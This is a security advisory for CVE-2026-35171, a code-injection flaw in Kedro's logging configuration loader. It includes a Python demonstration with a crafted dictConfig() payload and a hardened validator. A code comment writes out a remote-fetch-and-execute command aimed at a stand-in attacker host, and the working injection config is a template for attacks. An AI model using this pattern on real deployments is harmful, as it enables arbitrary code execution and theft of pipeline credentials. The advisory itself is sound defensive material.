CVE-2026-35171 Overview
CVE-2026-35171 is a critical Remote Code Execution (RCE) vulnerability in Kedro, a popular toolbox for production-ready data science. Prior to version 1.3.0, Kedro reads the path of its logging configuration file from the KEDRO_LOGGING_CONFIG environment variable and loads that file without validating its contents. Python's logging configuration schema supports the special () key, which names a callable to instantiate when the configuration is applied, so a crafted file can make the interpreter call any importable function with attacker-chosen arguments. An attacker can exploit this to execute arbitrary system commands during application startup.
This vulnerability is classified as Code Injection (CWE-94) and represents a severe security risk caused by the unsafe use of logging.config.dictConfig() with user-controlled input.
Critical Impact
Attackers able to set the environment of a Kedro process, or to write the logging configuration file it points at, can achieve full code execution with the privileges of that process on systems running vulnerable versions of Kedro, potentially compromising entire data science pipelines and the infrastructure those pipelines hold credentials for. The precondition is control of the variable or the file rather than network access to the application; whether that makes the bug remotely exploitable depends on how a deployment exposes its environment and configuration.
Affected Products
- Kedro versions prior to 1.3.0
Discovery Timeline
- 2026-04-06 - CVE-2026-35171 published to NVD
- 2026-04-07 - Last updated in NVD database
Technical Details for CVE-2026-35171
Vulnerability Analysis
This vulnerability stems from Kedro's handling of logging configuration during application initialization. The framework reads the KEDRO_LOGGING_CONFIG environment variable to determine the path to a logging configuration file and processes it using Python's logging.config.dictConfig() function without adequate input validation.
Python's logging.config.dictConfig() supports a special () key within handler, filter, and formatter definitions. Its value is a callable or a dotted import path; dictConfig() resolves the path by importing the module and then calls the result with the remaining keys of that entry as keyword arguments. Because any importable callable is accepted (subprocess.Popen with an args list, for example), pointing Kedro at a crafted logging file via the environment variable causes arbitrary Python code to run with the privileges of the Kedro process. Two details matter when triaging: dictConfig() instantiates formatters first, so a payload placed in a formatter fires even if no handler or logger references it, and the class key of a handler or formatter is resolved by import path in the same way, so an audit should not stop at the () key.
The vulnerability is particularly dangerous because it triggers during application startup, before the pipeline's own code or any security controls within the application can take effect. A compromised CI/CD job or deployment template only needs to plant one file and one environment variable, which makes this an effective vector for supply chain attacks on data science workflows.
Root Cause
The root cause is the lack of validation when loading user-controllable logging configuration. Kedro trusts the path in the KEDRO_LOGGING_CONFIG environment variable, parses the file, and passes the resulting dictionary directly to logging.config.dictConfig(). That function's support for the () key to instantiate arbitrary callables turns untrusted configuration into a code injection pathway: the flaw is not in parsing the file but in placing a configuration mechanism designed for trusted input on the wrong side of a trust boundary.
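The behaviour described in the analysis and root cause above, as an added example that is not Kedro's code: a vulnerable loader that hands file contents straight to dictConfig(), a constructed malicious configuration whose () factory is builtins.open (standing in for subprocess.Popen so the effect is a marker file rather than a spawned process), and a hardened loader with an allowlist. The allowlists, the UnsafeLoggingConfig class and the marker path are assumptions made for this example, not Kedro's actual fix.

```python
"""Added illustration of the dictConfig() factory-key issue, beside a validating
loader.  Not Kedro code; the allowlists below are this example's own."""
import logging
import logging.config
import os
import tempfile
from typing import Any, Dict

# Constructed sample: the shape of a file an attacker could point
# KEDRO_LOGGING_CONFIG at.  A real payload would use something like
#     (): subprocess.Popen
#     args: ["sh", "-c", "curl https://attacker.example/x | sh"]
# Here the factory is builtins.open and the kwargs create a marker file, so the
# "attacker-chosen callable, attacker-chosen arguments" effect is observable
# without spawning a process.
MARKER_PATH = os.path.join(tempfile.gettempdir(), "cve-2026-35171-marker")


def malicious_config() -> Dict[str, Any]:
    return {
        "version": 1,
        "disable_existing_loggers": False,
        "formatters": {                   # formatters are configured first, so this
            "pwn": {                      # fires even though no handler uses it
                "()": "builtins.open",    # any importable dotted path is accepted
                "file": MARKER_PATH,      # remaining keys become keyword arguments
                "mode": "w",
            }
        },
    }


def benign_config() -> Dict[str, Any]:
    return {
        "version": 1,
        "disable_existing_loggers": False,
        "formatters": {"plain": {"format": "%(levelname)s %(message)s"}},
        "handlers": {"console": {"class": "logging.StreamHandler",
                                 "formatter": "plain",
                                 "stream": "ext://sys.stderr"}},
        "root": {"level": "INFO", "handlers": ["console"]},
    }


def load_logging_unsafe(config: Dict[str, Any]) -> None:
    """The vulnerable pattern: trust whatever the file contained."""
    logging.config.dictConfig(config)


# Hardened loader.  These allowlists are assumptions made for this example.
ALLOWED_CLASSES = {
    "logging.Formatter", "logging.StreamHandler", "logging.FileHandler",
    "logging.NullHandler", "logging.handlers.RotatingFileHandler",
    "logging.handlers.TimedRotatingFileHandler",
}
ALLOWED_REFS = {"ext://sys.stdout", "ext://sys.stderr"}


class UnsafeLoggingConfig(ValueError):
    """Raised when a config could make dictConfig() import or call arbitrary code."""


def validate_logging_config(config: Dict[str, Any]) -> Dict[str, Any]:
    for section in ("formatters", "filters", "handlers"):
        for name, spec in (config.get(section) or {}).items():
            if not isinstance(spec, dict):
                continue
            if "()" in spec:
                raise UnsafeLoggingConfig(f"{section}.{name}: custom factory '()' is not allowed")
            cls = spec.get("class")
            if cls is not None and cls not in ALLOWED_CLASSES:
                raise UnsafeLoggingConfig(f"{section}.{name}: class {cls!r} is not allowlisted")
            for key, value in spec.items():
                # ext:// values are resolved by import path and cfg:// by config
                # lookup, so only known-safe references are accepted
                if (isinstance(value, str) and value.startswith(("ext://", "cfg://"))
                        and value not in ALLOWED_REFS):
                    raise UnsafeLoggingConfig(f"{section}.{name}.{key}: {value!r} is not allowlisted")
    return config


def load_logging_safe(config: Dict[str, Any]) -> None:
    logging.config.dictConfig(validate_logging_config(config))


def demo() -> Dict[str, bool]:
    """Run both loaders against the malicious config and report what happened."""
    if os.path.exists(MARKER_PATH):
        os.remove(MARKER_PATH)
    load_logging_unsafe(malicious_config())      # executes builtins.open(file=..., mode="w")
    created = os.path.exists(MARKER_PATH)
    try:
        load_logging_safe(malicious_config())
        blocked = False
    except UnsafeLoggingConfig:
        blocked = True
    load_logging_safe(benign_config())           # an ordinary config still loads
    return {"marker_created_by_unsafe_load": created, "blocked_by_validator": blocked}


if __name__ == "__main__":
    print(demo())
```

Running the block creates the marker file through the unsafe loader and refuses the same dictionary through the safe one while still accepting an ordinary console configuration. The validator rejects class values and ext:// references outside its allowlist as well as the () key, because dictConfig() resolves all three by import path; a check that looks only for () leaves the other two open.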
Attack Vector
The attack requires an adversary to either control the KEDRO_LOGGING_CONFIG environment variable or place a malicious logging configuration file at a path that Kedro will read. Attack scenarios include:
- Environment Variable Manipulation: In containerized or cloud environments where deployment manifests, orchestrator APIs, or CI variables that feed the process environment can be influenced by external actors
- Malicious Configuration Files: Placing a crafted YAML or JSON logging configuration file at the path KEDRO_LOGGING_CONFIG points to, or replacing the file already there
- Supply Chain Attacks: Compromising dependencies or CI/CD pipelines to inject malicious logging configurations
Once the malicious configuration is loaded, the attacker-specified callable is instantiated, leading to arbitrary code execution. This could be used to establish persistence, exfiltrate sensitive data from data science pipelines, or pivot to other systems.
Detection Methods for CVE-2026-35171
Indicators of Compromise
- Unexpected values in the KEDRO_LOGGING_CONFIG environment variable
- Logging configuration files whose formatter, filter, or handler entries carry a () key, or a class value outside the standard logging module, pointing at suspicious callables (subprocess, os, builtins and the like)
- Unusual process spawning during Kedro application startup
- Modifications to logging configuration files in project directories
Detection Strategies
- Monitor environment variable changes, particularly KEDRO_LOGGING_CONFIG, in production environments
- Implement file integrity monitoring on Kedro project configuration files
- Audit logging configuration files for the presence of the () key with external or suspicious callables
- Use static analysis to flag logging.config.dictConfig() and fileConfig() calls whose input comes from files or environment variables the process does not control
Monitoring Recommendations
- Enable process execution logging to detect unexpected child processes spawned by Kedro applications
- Configure alerts for modifications to environment variables in containerized deployments
- Review audit logs for unauthorized access to configuration file directories
- Implement runtime application self-protection (RASP) to detect code injection attempts
How to Mitigate CVE-2026-35171
Immediate Actions Required
- Upgrade Kedro to version 1.3.0 or later immediately
- Audit all KEDRO_LOGGING_CONFIG environment variable settings in production environments
- Review existing logging configuration files for suspicious () key usage
- Restrict write access to Kedro configuration directories
Patch Information
This vulnerability is fixed in Kedro version 1.3.0. The fix implements proper validation of logging configuration to prevent arbitrary callable instantiation through the () key mechanism. Organizations should upgrade to the patched version as soon as possible.
For additional details, refer to the GitHub Security Advisory.
Workarounds
- Remove or unset the KEDRO_LOGGING_CONFIG environment variable and use the default logging configuration; this only helps where the attacker cannot set the variable themselves, so pair it with the access controls below
- Implement strict file permissions on logging configuration files to prevent tampering
- Use container security policies to prevent environment variable modifications at runtime
- Deploy network segmentation to limit the impact of potential code execution
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

